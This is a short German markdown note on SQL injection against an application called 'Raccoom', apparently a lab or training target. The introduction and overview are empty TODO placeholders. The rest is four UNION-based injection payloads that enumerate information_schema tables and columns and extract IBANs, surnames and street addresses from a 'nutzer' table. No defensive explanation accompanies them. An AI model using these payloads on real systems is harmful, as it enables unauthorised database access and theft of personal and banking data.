# SQL-Injection bei Raccoom

## Einleitung

`//TODO`

---

## Übersicht

`//TODO`

---

## Snippets

Get all entries in currently accessible table:
```sql
';-- 
```

Get all tables from all databases:

```sql
nuss' UNION (SELECT TABLE_NAME, TABLE_SCHEMA, 3 FROM information_schema.tables);-- 
```

Get all rows from a discovered table:
```sql
nuss' UNION (SELECT COLUMN_NAME, 2, 3 FROM information_schema.columns WHERE TABLE_NAME = "nutzer");-- 
```

Select rows from a known tables:
```sql
nuss' UNION (SELECT iban, nachname, strasse FROM nutzer);-- 
```
